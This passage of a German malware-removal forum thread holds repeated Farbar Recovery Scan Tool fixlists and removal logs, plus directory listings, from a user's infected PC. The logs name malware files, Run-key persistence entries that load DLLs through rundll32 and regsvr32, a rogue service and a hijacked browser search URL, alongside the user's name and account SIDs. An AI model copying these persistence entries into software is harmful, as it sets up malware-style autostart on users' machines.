FF Plugin-x32: @qq.com/npchrome -> C:\Program Files (x86)\Common Files\Tencent\Npchrome\npchrome.dll [Keine Datei]
CHR DefaultSearchURL: Default -> hxxp://feed.mountainbrowse.com/?fext=true&publisherid=51623&publisher=mountext&st=et&q={searchTerms}
CHR DefaultSearchKeyword: Default -> Mount
S2 bespakduct; C:\WINDOWS\system32\config\systemprofile\AppData\Local\Quoteelectrics.exe [4608 2016-12-02] () [Datei ist nicht signiert]
R2 BitTorrent; C:\Program Files\BitTorrent\BitTorrent.exe [312320 2016-11-06] () [Datei ist nicht signiert] <==== ACHTUNG
C:\Program Files (x86)\Avira
C:\WINDOWS\System32\Tasks\{6BA690B0-1A65-4FE1-B843-96EDE2B0A4C7}
C:\WINDOWS\eiunin21.exe
C:\Users\Patrick\AppData\Roaming\d3dx10.exe
C:\m23apdfj.tmp.X
C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
C:\Program Files\BitTorrent
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Quoteelectrics.exe
C:\Program Files (x86)\Common Files\Tencent
C:\WINDOWS\system32\config\systemprofile\AppData\Local\huuigl.dll
G:\HiSuiteDownLoader.exe
E:\HiSuiteDownLoader.exe
G:\HiSuiteDownLoader.exe
C:\Windows\Temp\netstream.exe
C:\Windows\Temp\mgl64.exe
C:\Users\Patrick\AppData\Local\Idhsoft
C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
C:\Users\Patrick\AppData\Roaming\d3dx10.exe
C:\Users\Patrick\AppData\Roaming\update.dat
cmd: type C:\Users\Patrick\AppData\Roaming\Microsoft\notaut.txt
cmd: dir /oge-d "C:\Users\Patrick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
cmd: dir /oge-d "%APPDATA%"
cmd: dir /oge-d "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
cmd: dir /oge-d "%PROGRAMDATA%"
emptytemp:
       
*****************

Prozess erfolgreich geschlossen.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\Software\Microsoft\Windows\CurrentVersion\Run\\{71257112-2DEC-B5C4-6C86-88509071DF29} => Wert erfolgreich entfernt
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Idhsoft => Wert erfolgreich entfernt
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Akworks => Wert erfolgreich entfernt
"HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{19b79380-b27e-11e6-9858-201a06114318}" => Schlüssel erfolgreich entfernt
HKCR\CLSID\{19b79380-b27e-11e6-9858-201a06114318} => Schlüssel nicht gefunden.
"HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ca47ee10-8280-11e6-9848-201a06114318}" => Schlüssel erfolgreich entfernt
HKCR\CLSID\{ca47ee10-8280-11e6-9848-201a06114318} => Schlüssel nicht gefunden.
"HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8aa2e3c-7f52-11e6-983e-201a06114318}" => Schlüssel erfolgreich entfernt
HKCR\CLSID\{d8aa2e3c-7f52-11e6-983e-201a06114318} => Schlüssel nicht gefunden.
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\huuigl => Wert erfolgreich entfernt
C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\abs@avira.com.xpi => erfolgreich verschoben
C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\add-to-searchbox@maltekraus.de.xpi => erfolgreich verschoben
"HKLM\Software\Wow6432Node\MozillaPlugins\@qq.com/npchrome" => Schlüssel erfolgreich entfernt
Chrome DefaultSearchURL => erfolgreich entfernt
Chrome DefaultSearchKeyword => erfolgreich entfernt
bespakduct => Dienst erfolgreich entfernt
BitTorrent => Dienst konnte nicht gestoppt werden.
BitTorrent => Dienst erfolgreich entfernt
C:\Program Files (x86)\Avira => erfolgreich verschoben
C:\WINDOWS\System32\Tasks\{6BA690B0-1A65-4FE1-B843-96EDE2B0A4C7} => erfolgreich verschoben
C:\WINDOWS\eiunin21.exe => erfolgreich verschoben
C:\Users\Patrick\AppData\Roaming\d3dx10.exe => erfolgreich verschoben
C:\m23apdfj.tmp.X => erfolgreich verschoben
C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat => erfolgreich verschoben
C:\Program Files\BitTorrent => erfolgreich verschoben
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Quoteelectrics.exe => erfolgreich verschoben
"C:\Program Files (x86)\Common Files\Tencent" => nicht gefunden.
"C:\WINDOWS\system32\config\systemprofile\AppData\Local\huuigl.dll" => nicht gefunden.
"G:\HiSuiteDownLoader.exe" => nicht gefunden.
"E:\HiSuiteDownLoader.exe" => nicht gefunden.
"G:\HiSuiteDownLoader.exe" => nicht gefunden.
C:\Windows\Temp\netstream.exe => erfolgreich verschoben
C:\Windows\Temp\mgl64.exe => erfolgreich verschoben
C:\Users\Patrick\AppData\Local\Idhsoft => erfolgreich verschoben
"C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat" => nicht gefunden.
"C:\Users\Patrick\AppData\Roaming\d3dx10.exe" => nicht gefunden.
C:\Users\Patrick\AppData\Roaming\update.dat => erfolgreich verschoben

========= type C:\Users\Patrick\AppData\Roaming\Microsoft\notaut.txt =========

cosinus 03.12.2016 20:52
Fixlog ist unvollständig!

Machalla666 03.12.2016 21:30
Habe nochmal eine Fixlist mit dem code aus Post#21 erstellt und FRST laufen lassen.
hier das neue Logfile:

Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-12-2016
durchgeführt von Patrick (03-12-2016 21:27:21) Run:2
Gestartet von C:\Users\Patrick\Desktop
Geladene Profile: Patrick (Verfügbare Profile: Patrick)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
closeprocesses:
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [{71257112-2DEC-B5C4-6C86-88509071DF29}] => C:\Windows\Temp\mgl64.exe [335360 2016-12-03] (      Ghisler          Software  GmbH) <===== ACHTUNG
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [Idhsoft] => C:\Users\Patrick\AppData\Local\Idhsoft\mgl64.exe [335360 2016-12-02] (      Ghisler          Software  GmbH)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [Akworks] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Patrick\AppData\Local\Idhsoft\sbdzoqlr.dll
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {19b79380-b27e-11e6-9858-201a06114318} - "G:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {ca47ee10-8280-11e6-9848-201a06114318} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {d8aa2e3c-7f52-11e6-983e-201a06114318} - "G:\HiSuiteDownLoader.exe"
HKU\S-1-5-18\...\Run: [huuigl] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\huuigl.dll",huuigl <===== ACHTUNG
FF Extension: (Avira Browser Safety) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\abs@avira.com.xpi [2016-11-21]
FF Extension: (Add to Search Bar) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\add-to-searchbox@maltekraus.de.xpi [2016-01-20]
FF Plugin-x32: @qq.com/npchrome -> C:\Program Files (x86)\Common Files\Tencent\Npchrome\npchrome.dll [Keine Datei]
CHR DefaultSearchURL: Default -> hxxp://feed.mountainbrowse.com/?fext=true&publisherid=51623&publisher=mountext&st=et&q={searchTerms}
CHR DefaultSearchKeyword: Default -> Mount
S2 bespakduct; C:\WINDOWS\system32\config\systemprofile\AppData\Local\Quoteelectrics.exe [4608 2016-12-02] () [Datei ist nicht signiert]
R2 BitTorrent; C:\Program Files\BitTorrent\BitTorrent.exe [312320 2016-11-06] () [Datei ist nicht signiert] <==== ACHTUNG
C:\Program Files (x86)\Avira
C:\WINDOWS\System32\Tasks\{6BA690B0-1A65-4FE1-B843-96EDE2B0A4C7}
C:\WINDOWS\eiunin21.exe
C:\Users\Patrick\AppData\Roaming\d3dx10.exe
C:\m23apdfj.tmp.X
C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
C:\Program Files\BitTorrent
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Quoteelectrics.exe
C:\Program Files (x86)\Common Files\Tencent
C:\WINDOWS\system32\config\systemprofile\AppData\Local\huuigl.dll
G:\HiSuiteDownLoader.exe
E:\HiSuiteDownLoader.exe
G:\HiSuiteDownLoader.exe
C:\Windows\Temp\netstream.exe
C:\Windows\Temp\mgl64.exe
C:\Users\Patrick\AppData\Local\Idhsoft
C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
C:\Users\Patrick\AppData\Roaming\d3dx10.exe
C:\Users\Patrick\AppData\Roaming\update.dat
cmd: type C:\Users\Patrick\AppData\Roaming\Microsoft\notaut.txt
cmd: dir /oge-d "C:\Users\Patrick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
cmd: dir /oge-d "%APPDATA%"
cmd: dir /oge-d "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
cmd: dir /oge-d "%PROGRAMDATA%"
emptytemp:
*****************

Prozess erfolgreich geschlossen.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\Software\Microsoft\Windows\CurrentVersion\Run\\{71257112-2DEC-B5C4-6C86-88509071DF29} => Wert nicht gefunden.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Idhsoft => Wert nicht gefunden.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Akworks => Wert nicht gefunden.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{19b79380-b27e-11e6-9858-201a06114318} => Schlüssel nicht gefunden.
HKCR\CLSID\{19b79380-b27e-11e6-9858-201a06114318} => Schlüssel nicht gefunden.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ca47ee10-8280-11e6-9848-201a06114318} => Schlüssel nicht gefunden.
HKCR\CLSID\{ca47ee10-8280-11e6-9848-201a06114318} => Schlüssel nicht gefunden.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8aa2e3c-7f52-11e6-983e-201a06114318} => Schlüssel nicht gefunden.
HKCR\CLSID\{d8aa2e3c-7f52-11e6-983e-201a06114318} => Schlüssel nicht gefunden.
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\huuigl => Wert nicht gefunden.
C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\abs@avira.com.xpi => nicht gefunden.
C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\add-to-searchbox@maltekraus.de.xpi => nicht gefunden.
HKLM\Software\Wow6432Node\MozillaPlugins\@qq.com/npchrome => Schlüssel nicht gefunden.
Chrome DefaultSearchURL => nicht gefunden.
Chrome DefaultSearchKeyword => nicht gefunden.
bespakduct => Dienst nicht gefunden.
BitTorrent => Dienst nicht gefunden.
"C:\Program Files (x86)\Avira" => nicht gefunden.
"C:\WINDOWS\System32\Tasks\{6BA690B0-1A65-4FE1-B843-96EDE2B0A4C7}" => nicht gefunden.
"C:\WINDOWS\eiunin21.exe" => nicht gefunden.
"C:\Users\Patrick\AppData\Roaming\d3dx10.exe" => nicht gefunden.
"C:\m23apdfj.tmp.X" => nicht gefunden.
"C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat" => nicht gefunden.
"C:\Program Files\BitTorrent" => nicht gefunden.
"C:\WINDOWS\system32\config\systemprofile\AppData\Local\Quoteelectrics.exe" => nicht gefunden.
"C:\Program Files (x86)\Common Files\Tencent" => nicht gefunden.
"C:\WINDOWS\system32\config\systemprofile\AppData\Local\huuigl.dll" => nicht gefunden.
"G:\HiSuiteDownLoader.exe" => nicht gefunden.
"E:\HiSuiteDownLoader.exe" => nicht gefunden.
"G:\HiSuiteDownLoader.exe" => nicht gefunden.
"C:\Windows\Temp\netstream.exe" => nicht gefunden.
"C:\Windows\Temp\mgl64.exe" => nicht gefunden.
"C:\Users\Patrick\AppData\Local\Idhsoft" => nicht gefunden.
"C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat" => nicht gefunden.
"C:\Users\Patrick\AppData\Roaming\d3dx10.exe" => nicht gefunden.
"C:\Users\Patrick\AppData\Roaming\update.dat" => nicht gefunden.

========= type C:\Users\Patrick\AppData\Roaming\Microsoft\notaut.txt =========
EDIT:
Ich hätte vielleicht besser vorher genau fragen sollen was ich als nächstes tun soll. Ich bitte um entschuldigung.
Inwiefern war denn das letzte Fixlog unvollständig, bzw. was fehlte denn explizit?

cosinus 04.12.2016 02:56
Ich weiß nicht was es daran nicht zu verstehen gibt. Irgendwie postest du einfach nicht den kompletten Text im Fixlog. Alles markieren im Text geht übrigens mit STRG+A

Machalla666 04.12.2016 03:01
Du hattest recht, ich versteh das selber nicht ...
...hab die simpelsten Sachen nach Jahren iwie verlernt XD

Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-12-2016
durchgeführt von Patrick (03-12-2016 21:27:21) Run:2
Gestartet von C:\Users\Patrick\Desktop
Geladene Profile: Patrick (Verfügbare Profile: Patrick)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
closeprocesses:
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [{71257112-2DEC-B5C4-6C86-88509071DF29}] => C:\Windows\Temp\mgl64.exe [335360 2016-12-03] (      Ghisler          Software  GmbH) <===== ACHTUNG
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [Idhsoft] => C:\Users\Patrick\AppData\Local\Idhsoft\mgl64.exe [335360 2016-12-02] (      Ghisler          Software  GmbH)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [Akworks] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Patrick\AppData\Local\Idhsoft\sbdzoqlr.dll
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {19b79380-b27e-11e6-9858-201a06114318} - "G:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {ca47ee10-8280-11e6-9848-201a06114318} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\MountPoints2: {d8aa2e3c-7f52-11e6-983e-201a06114318} - "G:\HiSuiteDownLoader.exe"
HKU\S-1-5-18\...\Run: [huuigl] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\huuigl.dll",huuigl <===== ACHTUNG
FF Extension: (Avira Browser Safety) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\abs@avira.com.xpi [2016-11-21]
FF Extension: (Add to Search Bar) - C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\add-to-searchbox@maltekraus.de.xpi [2016-01-20]
FF Plugin-x32: @qq.com/npchrome -> C:\Program Files (x86)\Common Files\Tencent\Npchrome\npchrome.dll [Keine Datei]
CHR DefaultSearchURL: Default -> hxxp://feed.mountainbrowse.com/?fext=true&publisherid=51623&publisher=mountext&st=et&q={searchTerms}
CHR DefaultSearchKeyword: Default -> Mount
S2 bespakduct; C:\WINDOWS\system32\config\systemprofile\AppData\Local\Quoteelectrics.exe [4608 2016-12-02] () [Datei ist nicht signiert]
R2 BitTorrent; C:\Program Files\BitTorrent\BitTorrent.exe [312320 2016-11-06] () [Datei ist nicht signiert] <==== ACHTUNG
C:\Program Files (x86)\Avira
C:\WINDOWS\System32\Tasks\{6BA690B0-1A65-4FE1-B843-96EDE2B0A4C7}
C:\WINDOWS\eiunin21.exe
C:\Users\Patrick\AppData\Roaming\d3dx10.exe
C:\m23apdfj.tmp.X
C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
C:\Program Files\BitTorrent
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Quoteelectrics.exe
C:\Program Files (x86)\Common Files\Tencent
C:\WINDOWS\system32\config\systemprofile\AppData\Local\huuigl.dll
G:\HiSuiteDownLoader.exe
E:\HiSuiteDownLoader.exe
G:\HiSuiteDownLoader.exe
C:\Windows\Temp\netstream.exe
C:\Windows\Temp\mgl64.exe
C:\Users\Patrick\AppData\Local\Idhsoft
C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
C:\Users\Patrick\AppData\Roaming\d3dx10.exe
C:\Users\Patrick\AppData\Roaming\update.dat
cmd: type C:\Users\Patrick\AppData\Roaming\Microsoft\notaut.txt
cmd: dir /oge-d "C:\Users\Patrick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
cmd: dir /oge-d "%APPDATA%"
cmd: dir /oge-d "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
cmd: dir /oge-d "%PROGRAMDATA%"
emptytemp:
*****************

Prozess erfolgreich geschlossen.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\Software\Microsoft\Windows\CurrentVersion\Run\\{71257112-2DEC-B5C4-6C86-88509071DF29} => Wert nicht gefunden.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Idhsoft => Wert nicht gefunden.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Akworks => Wert nicht gefunden.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{19b79380-b27e-11e6-9858-201a06114318} => Schlüssel nicht gefunden.
HKCR\CLSID\{19b79380-b27e-11e6-9858-201a06114318} => Schlüssel nicht gefunden.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ca47ee10-8280-11e6-9848-201a06114318} => Schlüssel nicht gefunden.
HKCR\CLSID\{ca47ee10-8280-11e6-9848-201a06114318} => Schlüssel nicht gefunden.
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8aa2e3c-7f52-11e6-983e-201a06114318} => Schlüssel nicht gefunden.
HKCR\CLSID\{d8aa2e3c-7f52-11e6-983e-201a06114318} => Schlüssel nicht gefunden.
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\huuigl => Wert nicht gefunden.
C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\abs@avira.com.xpi => nicht gefunden.
C:\Users\Patrick\AppData\Roaming\Mozilla\Firefox\Profiles\5fqwv91p.default\Extensions\add-to-searchbox@maltekraus.de.xpi => nicht gefunden.
HKLM\Software\Wow6432Node\MozillaPlugins\@qq.com/npchrome => Schlüssel nicht gefunden.
Chrome DefaultSearchURL => nicht gefunden.
Chrome DefaultSearchKeyword => nicht gefunden.
bespakduct => Dienst nicht gefunden.
BitTorrent => Dienst nicht gefunden.
"C:\Program Files (x86)\Avira" => nicht gefunden.
"C:\WINDOWS\System32\Tasks\{6BA690B0-1A65-4FE1-B843-96EDE2B0A4C7}" => nicht gefunden.
"C:\WINDOWS\eiunin21.exe" => nicht gefunden.
"C:\Users\Patrick\AppData\Roaming\d3dx10.exe" => nicht gefunden.
"C:\m23apdfj.tmp.X" => nicht gefunden.
"C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat" => nicht gefunden.
"C:\Program Files\BitTorrent" => nicht gefunden.
"C:\WINDOWS\system32\config\systemprofile\AppData\Local\Quoteelectrics.exe" => nicht gefunden.
"C:\Program Files (x86)\Common Files\Tencent" => nicht gefunden.
"C:\WINDOWS\system32\config\systemprofile\AppData\Local\huuigl.dll" => nicht gefunden.
"G:\HiSuiteDownLoader.exe" => nicht gefunden.
"E:\HiSuiteDownLoader.exe" => nicht gefunden.
"G:\HiSuiteDownLoader.exe" => nicht gefunden.
"C:\Windows\Temp\netstream.exe" => nicht gefunden.
"C:\Windows\Temp\mgl64.exe" => nicht gefunden.
"C:\Users\Patrick\AppData\Local\Idhsoft" => nicht gefunden.
"C:\Users\Patrick\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat" => nicht gefunden.
"C:\Users\Patrick\AppData\Roaming\d3dx10.exe" => nicht gefunden.
"C:\Users\Patrick\AppData\Roaming\update.dat" => nicht gefunden.

========= type C:\Users\Patrick\AppData\Roaming\Microsoft\notaut.txt =========

 
========= Ende von CMD: =========

 
 
 = = = = = = = = =  d i r  / o g e - d  " C : \ U s e r s \ P a t r i c k \ A p p D a t a \ R o a m i n g \ M i c r o s o f t \ W i n d o w s \ S t a r t  M e n u \ P r o g r a m s "  = = = = = = = = =
 
 
 
  D a t e n t r  g e r  i n  L a u f w e r k  C :  i s t  S S D
 
  V o l u m e s e r i e n n u m m e r :  2 A 2 B - 9 5 9 B
 
 
 
  V e r z e i c h n i s  v o n  C : \ U s e r s \ P a t r i c k \ A p p D a t a \ R o a m i n g \ M i c r o s o f t \ W i n d o w s \ S t a r t  M e n u \ P r o g r a m s
 
 
 
 2 1 . 1 1 . 2 0 1 6    2 2 : 5 9        < D I R >                    a - M O D E L
 
 2 1 . 1 1 . 2 0 1 6    2 2 : 5 1        < D I R >                    . .
 
 2 1 . 1 1 . 2 0 1 6    2 2 : 5 1        < D I R >                    .
 
 1 0 . 1 1 . 2 0 1 6    1 9 : 2 7        < D I R >                    A d m i n i s t r a t i v e  T o o l s
 
 1 0 . 1 1 . 2 0 1 6    1 9 : 2 7        < D I R >                    S t a r t u p
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 6        < D I R >                    A c c e s s o r i e s
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 0        < D I R >                    N F O P a d
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 0        < D I R >                    W B F S  M a n a g e r
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 0        < D I R >                    F r e e R I P  M P 3  C o n v e r t e r
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 0        < D I R >                    J D o w n l o a d e r
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 0        < D I R >                    K o n g H a c k
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 0        < D I R >                    L I N E
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 0        < D I R >                    M i c r o s o f t  R e c h n e r - P l u s
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 0        < D I R >                    M E G A s y n c
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 2 8        < D I R >                    Y a n d e x
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 2 8        < D I R >                    U n H  S o l u t i o n s
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 2 8        < D I R >                    F r e e m a k e
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 2 8        < D I R >                    C F C A
 
 2 6 . 0 8 . 2 0 1 6    1 3 : 5 1        < D I R >                    B r a v e  I n c
 
 1 6 . 0 7 . 2 0 1 6    1 2 : 4 8        < D I R >                    W i n d o w s  P o w e r S h e l l
 
 1 6 . 0 7 . 2 0 1 6    1 2 : 4 7        < D I R >                    S y s t e m  T o o l s
 
 1 6 . 0 7 . 2 0 1 6    1 2 : 4 7        < D I R >                    M a i n t e n a n c e
 
 1 6 . 0 7 . 2 0 1 6    1 2 : 4 7        < D I R >                    A c c e s s i b i l i t y
 
 2 4 . 0 9 . 2 0 1 6    1 6 : 3 8                          2 . 3 9 6  O n e D r i v e . l n k
 
 2 3 . 1 2 . 2 0 1 5    1 2 : 2 3                          1 . 0 5 4  O p t i o n a l e  F e a t u r e s . l n k
 
 2 3 . 1 2 . 2 0 1 5    0 0 : 0 5                          1 . 3 3 3  R e a l t e k  H D  A u d i o - M a n a g e r . l n k
 
                              3  D a t e i ( e n ) ,                    4 . 7 8 3  B y t e s
 
                            2 3  V e r z e i c h n i s ( s e ) ,  8 6 . 0 3 0 . 1 5 9 . 8 7 2  B y t e s  f r e i
 
 
 
 = = = = = = = = =  E n d e  v o n  C M D :  = = = = = = = = =
 
 
 
 
 
 = = = = = = = = =  d i r  / o g e - d  " % A P P D A T A % "  = = = = = = = = =
 
 
 
  D a t e n t r  g e r  i n  L a u f w e r k  C :  i s t  S S D
 
  V o l u m e s e r i e n n u m m e r :  2 A 2 B - 9 5 9 B
 
 
 
  V e r z e i c h n i s  v o n  C : \ U s e r s \ P a t r i c k \ A p p D a t a \ R o a m i n g
 
 
 
 0 3 . 1 2 . 2 0 1 6    2 0 : 2 2        < D I R >                    . .
 
 0 3 . 1 2 . 2 0 1 6    2 0 : 2 2        < D I R >                    .
 
 2 8 . 1 1 . 2 0 1 6    0 2 : 0 4        < D I R >                    A z u r e u s
 
 2 6 . 1 1 . 2 0 1 6    1 7 : 0 7        < D I R >                    N V I D I A
 
 2 6 . 1 1 . 2 0 1 6    0 1 : 5 2        < D I R >                    S u n
 
 2 6 . 1 1 . 2 0 1 6    0 1 : 3 8        < D I R >                    R e n P y
 
 0 9 . 1 1 . 2 0 1 6    2 2 : 4 5        < D I R >                    v l c
 
 0 6 . 1 1 . 2 0 1 6    1 8 : 1 0        < D I R >                    D a s s a u l t S y s t e m e s
 
 1 9 . 1 0 . 2 0 1 6    0 6 : 4 5        < D I R >                    D A E M O N  T o o l s  L i t e
 
 0 2 . 1 0 . 2 0 1 6    0 0 : 2 4        < D I R >                    M e d i a  P l a y e r  C l a s s i c
 
 0 1 . 1 0 . 2 0 1 6    2 3 : 0 6        < D I R >                    M P C - H C
 
 2 4 . 0 9 . 2 0 1 6    1 8 : 5 5        < D I R >                    S h u a m e
 
 2 0 . 0 9 . 2 0 1 6    1 8 : 4 2        < D I R >                    W a n d o u j i a U s b D r i v e r
 
 1 0 . 0 9 . 2 0 1 6    1 8 : 1 2        < D I R >                    V o i d R a i d e r s
 
 0 4 . 0 9 . 2 0 1 6    1 3 : 1 9        < D I R >                    P y r o d a c t y l
 
 2 6 . 0 8 . 2 0 1 6    1 3 : 5 0        < D I R >                    b r a v e
 
 2 1 . 0 8 . 2 0 1 6    1 5 : 3 2        < D I R >                    Y a n d e x
 
 1 6 . 0 8 . 2 0 1 6    0 5 : 4 0        < D I R >                    f r e a c
 
 2 3 . 0 7 . 2 0 1 6    1 7 : 1 6        < D I R >                    m p 3 D i r e c t C u t
 
 1 6 . 0 7 . 2 0 1 6    1 3 : 3 9        < D I R >                    S e c r e t s  o f  G r i n d e a
 
 1 0 . 0 7 . 2 0 1 6    0 8 : 2 0        < D I R >                    d v d c s s
 
 0 8 . 0 7 . 2 0 1 6    2 3 : 1 3        < D I R >                    { C B 6 C F D D 7 - E E 3 E - 9 0 A 1 - 8 5 0 8 - B 7 7 3 5 9 D A 4 A 4 D }
 
 0 3 . 0 7 . 2 0 1 6    1 0 : 1 5        < D I R >                    A t h e r o s
 
 0 3 . 0 7 . 2 0 1 6    0 2 : 4 3        < D I R >                    U p r t
 
 1 8 . 0 6 . 2 0 1 6    0 1 : 0 4        < D I R >                    S m a r t S t e a m E m u
 
 1 0 . 0 6 . 2 0 1 6    0 6 : 1 5        < D I R >                    A p o w e r s o f t
 
 1 0 . 0 5 . 2 0 1 6    2 1 : 0 8        < D I R >                    D a r k S o u l s I I I
 
 0 3 . 0 5 . 2 0 1 6    2 1 : 4 9        < D I R >                    S t e a m
 
 2 2 . 0 4 . 2 0 1 6    1 6 : 2 7        < D I R >                    W i n R A R
 
 2 8 . 0 3 . 2 0 1 6    2 2 : 3 0        < D I R >                    G 4 E
 
 0 8 . 0 1 . 2 0 1 6    2 2 : 0 2        < D I R >                    F r e e C A D
 
 0 7 . 0 1 . 2 0 1 6    0 0 : 3 5        < D I R >                    U n i g r a p h i c s  S o l u t i o n s
 
 2 2 . 1 2 . 2 0 1 5    2 3 : 3 5        < D I R >                    A d o b e
 
 2 2 . 1 2 . 2 0 1 5    2 2 : 3 4        < D I R >                    U n i t y
 
 2 2 . 1 2 . 2 0 1 5    2 2 : 3 1        < D I R >                    M a c r o m e d i a
 
 2 2 . 1 2 . 2 0 1 5    2 1 : 4 8        < D I R >                    M o z i l l a
 
 3 1 . 1 2 . 2 0 1 5    0 0 : 1 2        < D I R >                    . L U F T R A U S E R S
 
 2 7 . 1 1 . 2 0 1 6    1 5 : 1 8        < D I R >                    . m a d g a r d e n
 
 0 1 . 1 1 . 2 0 1 6    2 2 : 2 5        < D I R >                    c o m . c o u r s e v e c t o r . m i n e r v a
 
